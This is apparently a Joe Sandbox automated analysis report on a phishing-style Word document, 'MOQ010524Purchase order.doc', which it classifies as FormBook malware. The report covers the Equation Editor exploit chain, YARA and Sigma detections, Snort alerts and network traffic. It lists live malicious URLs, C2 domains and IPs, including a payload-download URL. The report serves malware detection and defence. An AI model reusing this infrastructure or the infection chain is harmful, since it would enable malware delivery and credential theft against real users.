Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MOQ010524Purchase order.doc

Overview

General Information

Sample name:MOQ010524Purchase order.doc
Analysis ID:1435172
MD5:7ebb7f9239d5dea3e17fd9b51f12c5a7
SHA1:8b73d2e1bf47b9150706d3fbfad2878447e750bf
SHA256:49eae141b85b2dee809a1e86df1518d2d32a79367cf1a01f55f98c98d32f59ce
Tags:doc
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic
Yara detected FormBook
.NET source code references suspicious native API functions
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1808 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • op55336.scr (PID: 3192 cmdline: "C:\Users\user\AppData\Roaming\op55336.scr" MD5: 3CCB984FD28AFEA83F2F2E8A6ED4CCFA)
        • op55336.scr (PID: 3224 cmdline: "C:\Users\user\AppData\Roaming\op55336.scr" MD5: 3CCB984FD28AFEA83F2F2E8A6ED4CCFA)
          • eDTvjJMLUGCaWhgZ.exe (PID: 2584 cmdline: "C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • dfrgui.exe (PID: 3372 cmdline: "C:\Windows\SysWOW64\dfrgui.exe" MD5: FB036244DBD2FADC225AD8650886B641)
              • eDTvjJMLUGCaWhgZ.exe (PID: 2848 cmdline: "C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 3760 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
    • EQNEDT32.EXE (PID: 3396 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
MOQ010524Purchase order.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xb441:$obj2: \objdata
  • 0xb459:$obj3: \objupdate
  • 0xb41d:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x389b7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x22836:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.op55336.scr.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.op55336.scr.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ea03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x18882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          6.2.op55336.scr.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.op55336.scr.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dc03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17a82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            5.2.op55336.scr.3506390.5.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
            • 0x6b46b:$x1: In$J$ct0r
            Click to see the 5 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1808, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\op55336.scr", CommandLine: "C:\Users\user\AppData\Roaming\op55336.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\op55336.scr, NewProcessName: C:\Users\user\AppData\Roaming\op55336.scr, OriginalFileName: C:\Users\user\AppData\Roaming\op55336.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1808, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\op55336.scr", ProcessId: 3192, ProcessName: op55336.scr
            Sigma detected: SCR File Write Event
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr
            Sigma detected: Suspicious Screensaver Binary File Creation
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1808, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

            Snort Signatures

            Timestamp:05/02/24-08:28:41.519542
            SID:2855465
            Source Port:49185
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:29:16.698315
            SID:2855465
            Source Port:49193
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:29:58.393847
            SID:2855465
            Source Port:49201
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:27:38.140761
            SID:2855465
            Source Port:49169
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:29:36.365325
            SID:2855465
            Source Port:49197
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:28:05.644786
            SID:2855465
            Source Port:49177
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:29:01.993967
            SID:2855465
            Source Port:49189
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:27:51.914592
            SID:2855465
            Source Port:49173
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:26:56.872559
            SID:2855465
            Source Port:49164
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/02/24-08:28:23.793699
            SID:2855465
            Source Port:49181
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://universalmovies.top/opp.scrAvira URL Cloud: Label: phishing
            Source: https://universalmovies.top/opp.scrhhC:Avira URL Cloud: Label: phishing
            Source: https://universalmovies.top/opp.scrjAvira URL Cloud: Label: phishing
            Source: http://www.terelprime.com/ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8kAvira URL Cloud: Label: malware
            Source: https://universalmovies.top/Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for domain / URL
            Source: universalmovies.topVirustotal: Detection: 23%Perma Link
            Multi AV Scanner detection for submitted file
            Source: MOQ010524Purchase order.docVirustotal: Detection: 41%Perma Link
            Source: MOQ010524Purchase order.docReversingLabs: Detection: 36%
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\op55336.scrJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scrJoe Sandbox ML: detected

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.74.191 Port: 443Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op55336.scr
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op55336.scrJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: op55336.scr, 00000005.00000002.351721062.0000000002491000.00000004.00000800.00020000.00000000.sdmp, op55336.scr, 00000005.00000002.351512154.00000000003B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847158763.00000000001FE000.00000002.00000001.01000000.00000008.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847139863.00000000001FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dfrgui.pdb2D source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: op55336.scr, op55336.scr, 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.0000000002170000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.410885708.0000000001E80000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: global trafficDNS query: name: universalmovies.top
            Source: global trafficDNS query: name: www.besthomeincome24.com
            Source: global trafficDNS query: name: www.terelprime.com
            Source: global trafficDNS query: name: www.sqlite.org
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.kinkynerdspro.blog
            Source: global trafficDNS query: name: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS query: name: www.primeplay88.org
            Source: global trafficDNS query: name: www.aceautocorp.com
            Source: global trafficDNS query: name: www.mrart.co.kr
            Source: global trafficDNS query: name: www.touchclean.top
            Source: global trafficDNS query: name: www.ibistradingco.com
            Source: global trafficDNS query: name: www.jnkinteractive.co.kr
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.chrisdomond.com
            Source: global trafficDNS query: name: www.riveramayahousing.com
            Source: global trafficDNS query: name: www.exclaimer342200213.net
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.23.162.163:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 91.195.240.19:80
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 198.12.241.35:80
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 183.111.183.31:80
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 67.223.117.189:80
            Source: global trafficTCP traffic: 192.168.2.22:49193 -> 154.41.250.58:80
            Source: global trafficTCP traffic: 192.168.2.22:49197 -> 183.111.183.31:80
            Source: global trafficTCP traffic: 192.168.2.22:49201 -> 208.91.197.13:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
